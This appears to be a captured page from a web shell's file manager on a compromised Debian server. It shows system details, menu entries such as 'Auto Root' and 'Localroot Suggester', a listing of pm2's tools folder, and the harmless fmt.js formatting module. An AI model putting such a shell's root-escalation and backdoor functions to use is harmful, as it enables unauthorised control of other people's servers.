Linux vmi2545633.contaboserver.net 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64
Apache/2.4.62 (Debian)
Server IP : 127.0.0.1 & Your IP : 127.0.0.1
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
node_modules /
pm2 /
lib /
tools /
Delete
Unzip
Name
Size
Permission
Date
Action
Config.js
6.09
KB
-rw-r--r--
2025-04-08 13:05
IsAbsolute.js
606
B
-rw-r--r--
2025-04-08 13:05
copydirSync.js
2.82
KB
-rw-r--r--
2025-04-08 13:05
deleteFolderRecursive.js
480
B
-rw-r--r--
2025-04-08 13:05
find-package-json.js
1.73
KB
-rw-r--r--
2025-04-08 13:05
fmt.js
2.04
KB
-rw-r--r--
2025-04-08 13:05
isbinaryfile.js
2.64
KB
-rw-r--r--
2025-04-08 13:05
json5.js
22.94
KB
-rw-r--r--
2025-04-08 13:05
open.js
1.57
KB
-rw-r--r--
2025-04-08 13:05
passwd.js
1.13
KB
-rw-r--r--
2025-04-08 13:05
promise.min.js
2.59
KB
-rw-r--r--
2025-04-08 13:05
sexec.js
1.17
KB
-rw-r--r--
2025-04-08 13:05
treeify.js
3.46
KB
-rw-r--r--
2025-04-08 13:05
which.js
3.49
KB
-rw-r--r--
2025-04-08 13:05
xdg-open
20.93
KB
-rwxr-xr-x
2025-04-08 13:05
Save
Rename
// -------------------------------------------------------------------------------------------------------------------- // // fmt.js - Command line output formatting. // // Copyright (c) 2012 Andrew Chilton - http://chilts.org/ // Written by Andrew Chilton <andychilton@gmail.com> // // License: http://opensource.org/licenses/MIT // // -------------------------------------------------------------------------------------------------------------------- var util = require('util'); // -------------------------------------------------------------------------------------------------------------------- var sep = '==============================================================================='; var line = '-------------------------------------------------------------------------------'; var field = ' '; // -------------------------------------------------------------------------------------------------------------------- // separator module.exports.separator = function() { console.log(sep); }; // alias the above module.exports.sep = module.exports.separator; // line module.exports.line = function() { console.log(line); }; // title module.exports.title = function(title) { var out = '--- ' + title + ' '; out += line.substr(out.length); console.log(out); }; // field module.exports.field = function(key, value) { console.log('' + key + field.substr(key.length) + ' : ' + value); }; // subfield module.exports.subfield = function(key, value) { console.log('- ' + key + field.substr(key.length + 2) + ' : ' + value); }; // list item module.exports.li = function(msg) { console.log('* ' + msg); }; // dump module.exports.dump = function(data, name) { if ( name ) { console.log(name + ' :', util.inspect(data, false, null, true)); } else { console.log(util.inspect(data, false, null, true)); } }; // msg module.exports.msg = function(msg) { console.log(msg); }; // --------------------------------------------------------------------------------------------------------------------